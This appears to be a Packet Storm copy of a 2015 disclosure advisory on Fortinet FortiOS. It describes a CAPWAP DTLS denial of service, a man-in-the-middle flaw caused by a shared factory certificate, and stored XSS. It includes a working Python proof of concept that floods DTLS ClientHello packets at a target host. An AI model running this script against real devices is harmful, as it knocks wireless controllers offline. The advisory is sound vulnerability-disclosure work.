exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Fortinet FortiOS Denial Of Service / Man-In-The-Middle

Fortinet FortiOS Denial Of Service / Man-In-The-Middle
Posted Jan 29, 2015
Authored by Denis Andzakovic | Site security-assessment.com

Fortinet FortiOS with firmware 5.0 build 4457 (GA Patch 7) suffers from a CAPWAP daemon DTLS denial of service vulnerability and man-in-the-middle vulnerability.

tags | exploit, denial of service
SHA-256 | 1d7eabcba5b448e1f50b41f696a137829a3448ee8819d84a471f0f1752e6f73c

Fortinet FortiOS Denial Of Service / Man-In-The-Middle

Change Mirror Download
(    , )     (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq


Fortinet FortiOS Multiple Vulnerabilities
Affected Versions: Verified on FortiOS Firmware v5.0,build4457 (GA Patch 7)


| Description |
This advisory details multiple vulnerabilities found within the Fortinet
FortiOS software. FortiOS is a security-hardened, purpose-built Operating
System that is the foundation of all FortiGate network security platforms.

A denial of service vulnerability was discovered within the CAPWAP Daemon,
allowing an attacker to lock the CAPWAP Access Controller. This was achieved
by sending recurring DTLS messages to the daemon. The CAPWAP daemon itself was
found to suffer from a Man-In-The-Middle vulnerability, due to the nature of
Fortinet’s certificate practices. A Stored Cross Site Scripting vulnerability
was also discovered, allowing an attacker to send a crafted CAPWAP join
request containing malicious JavaScript code. This code is subsequently
rendered in the FortiOS administrative console.

| Exploitation |

--[ CAPWAP Daemon DTLS Denial of Service Vulnerability

During the DTLS session establishment, the protocol implements a
‘HelloVerifyRequest’ send back to the client in response to the initial
‘ClientHello’. The client is then required to send a ‘ClientHello’ with a
specific cookie provided in the ‘HelloVerifyRequest’. This is designed to
protect against Denial of Service attacks. It was discovered that, even though
the Fortinet DTLS server implements this, sending a number of initial
‘ClientHello’ requests in short succession creates a denial of service
condition on the FortiOS device.

The number of requests required to trigger the condition was found to be
dependent on the specifications of the machine running FortiOS, however this
was tested against a mid-range Fortigate device and successfully caused a
Denial of Service condition with as little as ten requests.

The following POC code can be used to replicate this vulnerability:

# FortiOS CAPWAP Control Denial Of Service POC
# This exploit will trigger a denial of service
# condition on the FortiOS CAPWAP Control Daemon
# by sending recurring DTLS Client Hello
# messages.
# Author: Denis Andzakovic
# Date: 19/08/2014

import socket
import os
import time
from struct import pack
import binascii
import argparse

# Grab parameters from command line
parser = argparse.ArgumentParser(description='FortiOS CAPWAP Control Server - DTLS Client Hello DOS')
parser.add_argument('-d','--host', help="IP Address of the host to attack", required=True)
args = parser.parse_args()

randombytes = os.urandom(28)
capwapreamble = "\x01\x00\x00\x00"
hello = "\x16" + "\xfe\xff" + "\x00"*8 #handshake id, version, epoch and seq
handshakeProtocol = "\x01" + "\x00\x00\x2c" + "\x00"*6 + "\x00\x2c" + "\xfe\xff" + pack(">i",int(time.time())) + randombytes + "\x00" + "\x00" + "\x00\x04" + "\x00\x2f\x00\x0a\x01\x00"

while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(capwapreamble + hello + pack(">H",len(handshakeProtocol)) + handshakeProtocol, (args.host, 5246))
resp, senderaddr = sock.recvfrom(4098)

cookie = resp[31:]
print "[+] Got response. Cookie: " + binascii.hexlify(cookie)

--[ DTLS Man-In-The-Middle Vulnerability

Fortinet devices were found to use DTLS for the CAPWAP control protocol, with
the CAPWAP data protocol being cleartext by default. The CAPWAP DTLS protocol
was found to use a universal ‘Fortinet_Factory’ certificate and private key,
the certificate authority for which is static across all Fortinet devices. A
method for replacing this certificate was not found.

By harvesting this certificate and key, an attacker may stage Man in the
Middle attacks against any Fortinet device using the CAPWAP DTLS protocol.
This allows for the retrieval of sensitive information such as wireless SSIDs
and WPA passphrases. The two files, ‘Fortinet_Factory.cer’ and
‘Fortinet_Factory.key’ can be found in the /etc/cert/local directory on
Fortinet devices.

The following details the ‘Fortinet_Factory’ certificate and private
key. By using the following certificate an attacker may stage
Man in the Middle attacks against any Fortinet access point or wireless
controller implementing the CAPWAP Control protocol globally.



--[ Stored Cross Site Scripting Vulnerability

By sending a crafted CAPWAP Join packet, a malicious entity may stage Cross
Site Scripting attacks against legitimate administrative users. This is
achieved by inserting malicious JavaScript code into the WTP Name or WTP
Active Software Version fields within the CAPWAP Join request. The WTP Active
Software Version field is a child parameter of the WTP Descriptor message

| Solution |
There is no official solution for these issues. All Access Controller to
Wireless Termination Point (and vice-versa) traffic is recommended to be kept
on a secure network and rigorously firewalled to reduce the exploitability of
these vulnerabilities.

| Disclosure Timeline |
08/10/2014 - Initial email sent to Fortinet PSIRT team.
09/10/2014 - Advisory documents sent to Fortinet.
15/10/2014 - Acknowledgement of advisories from Fortinet.
16/10/2014 - Update requested from Fortinet.
02/12/2014 - Update requested from Fortinet.
13/12/2014 - Update requested from Fortinet.
29/01/2015 - Advisory Release.

| About Security-Assessment.com |

Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings,
contact us:

Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650

Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By